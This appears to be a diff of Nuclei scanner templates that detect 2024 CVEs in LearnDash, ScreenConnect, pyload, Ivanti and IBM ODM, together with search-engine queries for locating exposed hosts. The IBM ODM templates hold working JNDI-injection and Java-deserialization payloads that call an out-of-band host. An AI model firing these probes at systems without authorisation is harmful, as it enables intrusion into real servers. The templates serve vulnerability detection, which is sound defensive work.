|
product: learndash
|
||||||
|
framework: wordpress
|
||||||
|
googledork-query: inurl:"/wp-content/plugins/sfwd-lms"
|
||||||
|
publicwww-query: "/wp-content/plugins/sfwd-lms"
|
||||||
|
tags: cve,cve2024,wp,wp-plugin,wordpress,exposure,learndash
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-json/ldlms/v1/sfwd-quiz"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '"id":'
|
||||||
|
- '"quiz_materials":'
|
||||||
|
- 'quizzes'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- 'application/json'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
# digest: 490a00463044022079f0e028ee4fd33b5e897e0550a707be3dbe291e8085b9d175297108e9c8858102202a9344a25a6ec5fa1fc025e439a8887f6cc9c9ac50b6c199f1fa27e4cc948855:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,56 @@
|
||||||
|
id: CVE-2024-1709
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: ConnectWise ScreenConnect 23.9.7 - Authentication Bypass
|
||||||
|
author: johnk3r
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.
|
||||||
|
reference:
|
||||||
|
- https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass
|
||||||
|
- https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc
|
||||||
|
- https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-1709
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||||
|
cvss-score: 10.0
|
||||||
|
cve-id: CVE-2024-1709
|
||||||
|
cwe-id: CWE-288
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
vendor: connectwise
|
||||||
|
product: screenconnect
|
||||||
|
shodan-query: http.favicon.hash:-82958153
|
||||||
|
fofa-query: app="ScreenConnect-Remote-Support-Software"
|
||||||
|
zoomeye-query: app:"ScreenConnect Remote Management Software"
|
||||||
|
hunter-query: app.name="ConnectWise ScreenConnect software"
|
||||||
|
tags: cve,cve2024,screenconnect,connectwise,auth-bypass,kev
|
||||||
|
|
||||||
|
variables:
|
||||||
|
string: "{{rand_text_alpha(10)}}"
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/SetupWizard.aspx/{{string}}"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "SetupWizardPage"
|
||||||
|
- "ContentPanel SetupWizard"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: kval
|
||||||
|
part: header
|
||||||
|
kval:
|
||||||
|
- Server
|
||||||
|
# digest: 4a0a00473045022100a74505da69fc5fb96361adc56f169fe3a2e25cf85bc6df3b254da6430f8f723f02200dd625105f73d1d23ede46af0dbee84cce441acdb5c91079411b20c841a8bf23:922c64590222798bb761d5b6d8e72950
|
|
@ -6,25 +6,26 @@ info:
|
||||||
severity: medium
|
severity: medium
|
||||||
description: |
|
description: |
|
||||||
A log injection vulnerability was identified in pyload. This vulnerability allows any unauthenticated actor to inject arbitrary messages into the logs gathered by pyload.
|
A log injection vulnerability was identified in pyload. This vulnerability allows any unauthenticated actor to inject arbitrary messages into the logs gathered by pyload.
|
||||||
impact: |
|
|
||||||
Forged or otherwise, corrupted log files can be used to cover an attacker's tracks or even to implicate another party in the commission of a malicious act.
|
|
||||||
reference:
|
reference:
|
||||||
- https://github.com/advisories/GHSA-ghmw-rwh8-6qmr
|
- https://github.com/advisories/GHSA-ghmw-rwh8-6qmr
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-21645
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-21645
|
||||||
- https://github.com/fkie-cad/nvd-json-data-feeds
|
- https://github.com/fkie-cad/nvd-json-data-feeds
|
||||||
|
impact: |
|
||||||
|
Forged or otherwise, corrupted log files can be used to cover an attacker's tracks or even to implicate another party in the commission of a malicious act.
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
|
||||||
cvss-score: 5.3
|
cvss-score: 5.3
|
||||||
cve-id: CVE-2024-21645
|
cve-id: CVE-2024-21645
|
||||||
cwe-id: CWE-74
|
cwe-id: CWE-74
|
||||||
|
cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:*
|
||||||
epss-score: 0.00046
|
epss-score: 0.00046
|
||||||
epss-percentile: 0.13723
|
epss-percentile: 0.13723
|
||||||
cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:*
|
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: true
|
||||||
vendor: pyload
|
vendor: pyload
|
||||||
product: pyload
|
product: pyload
|
||||||
shodan-query: title:"pyload"
|
shodan-query: "title:\"pyload\""
|
||||||
|
max-request: 2
|
||||||
tags: cve,cve2024,pyload,authenticated,injection
|
tags: cve,cve2024,pyload,authenticated,injection
|
||||||
|
|
||||||
variables:
|
variables:
|
||||||
|
@ -59,4 +60,4 @@ http:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
# digest: 4a0a00473045022100e4681bad6b75b2295f0256953d1d293a42d79e61b3607a307caf6cc5b040ccbb02201912657be888fe3a799ada24aaa1de05d3667731e84900bedb0e556a187f2dfc:922c64590222798bb761d5b6d8e72950
|
# digest: 490a0046304402203cbf3ae7a02a2a68165345f0bd855eb6ab923669c8d2aa78f2922e0baee747f702201104ac76e942d9f3bff9d59b6e4227e4d59ff27e41aeca67e1138508b572d5b9:922c64590222798bb761d5b6d8e72950
|
|
@ -18,8 +18,9 @@ info:
|
||||||
cpe: cpe:2.3:a:ivanti:connect_secure:9.0:-:*:*:*:*:*:*
|
cpe: cpe:2.3:a:ivanti:connect_secure:9.0:-:*:*:*:*:*:*
|
||||||
metadata:
|
metadata:
|
||||||
vendor: ivanti
|
vendor: ivanti
|
||||||
product: connect_secure
|
product: "connect_secure"
|
||||||
shodan-query: "html:\"welcome.cgi?p=logo\""
|
shodan-query: "html:\"welcome.cgi?p=logo\""
|
||||||
|
max-request: 1
|
||||||
tags: cve,cve2024,kev,ssrf,ivanti
|
tags: cve,cve2024,kev,ssrf,ivanti
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
@ -43,4 +44,4 @@ http:
|
||||||
- '/dana-na/'
|
- '/dana-na/'
|
||||||
- 'WriteCSS'
|
- 'WriteCSS'
|
||||||
condition: and
|
condition: and
|
||||||
# digest: 4a0a00473045022100fefc6637185b28b4af8b503bdb7b89401fc591c34cb6082b20322ac0f1ad67c8022027e634cbc733ad699766de6d8eb8f22b6368d0b663cd28cbd957eaaf37f51838:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022031bba2e0349c9af3102196e00e85678ddbb51ba287e5d624558a50a3bbaa6be20221008a362ec4ef64ece7ab22636b902c72df49e1f72c519731e5c2eb22dec2db5c76:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,39 @@
|
||||||
|
id: CVE-2024-22319
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: IBM Operational Decision Manager - JNDI Injection
|
||||||
|
author: DhiyaneshDK
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API. IBM X-Force ID: 279145.
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2024-22319
|
||||||
|
cwe-id: CWE-74
|
||||||
|
epss-score: 0.00283
|
||||||
|
epss-percentile: 0.67752
|
||||||
|
cpe: cpe:2.3:a:ibm:operational_decision_manager:8.10.3:*:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
vendor: ibm
|
||||||
|
product: operational_decision_manager
|
||||||
|
shodan-query: html:"IBM ODM"
|
||||||
|
fofa-query: title="IBM ODM"
|
||||||
|
tags: cve,cve2024,ibm,odm,decision-manager,jndi,jsf,rce
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/decisioncenter-api/v1/about?datasource=ldap://{{interactsh-url}}"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- contains(interactsh_protocol, "dns")
|
||||||
|
- 'contains(header, "application/json")'
|
||||||
|
- 'contains(body, "patchLevel\":")'
|
||||||
|
- 'status_code == 200'
|
||||||
|
condition: and
|
||||||
|
# digest: 4a0a00473045022100bd482d70c6c93cf274bdde0ad6aefa255e1e20edcff44034afb21a45d3fc96e802204f0c9289a94160d4606e60e859ca554ead9d6b21a8441a9d9bf065ec7f9f3cd4:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,49 @@
|
||||||
|
id: CVE-2024-22320
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: IBM Operational Decision Manager - Java Deserialization
|
||||||
|
author: DhiyaneshDK
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization. By sending specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code in the context of SYSTEM. IBM X-Force ID: 279146.
|
||||||
|
reference:
|
||||||
|
- https://labs.watchtowr.com/double-k-o-rce-in-ibm-operation-decision-manager/
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-22320
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 8.8
|
||||||
|
cve-id: CVE-2024-22320
|
||||||
|
cwe-id: CWE-502
|
||||||
|
epss-score: 0.00283
|
||||||
|
epss-percentile: 0.67773
|
||||||
|
cpe: cpe:2.3:a:ibm:operational_decision_manager:8.10.3:*:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
vendor: ibm
|
||||||
|
product: operational_decision_manager
|
||||||
|
shodan-query: html:"IBM ODM"
|
||||||
|
fofa-query: title="IBM ODM"
|
||||||
|
tags: cve,cve2024,ibm,odm,decision-manager,deserialization,jsf,rce
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/res/login.jsf?javax.faces.ViewState={{generate_java_gadget("dns", "http://{{interactsh-url}}", "base64")}}'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol
|
||||||
|
words:
|
||||||
|
- "dns"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- 'javax.servlet.ServletException'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 500
|
||||||
|
# digest: 4a0a0047304502210098cb051d3eaa91348194c7ecd090833e583697c9d77cd778763d770664584db60220693f3bc37f42c69a6e2c7f3c052d0af3e6f5b6dabf1c36d80c23967672fc642b:922c64590222798bb761d5b6d8e72950
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue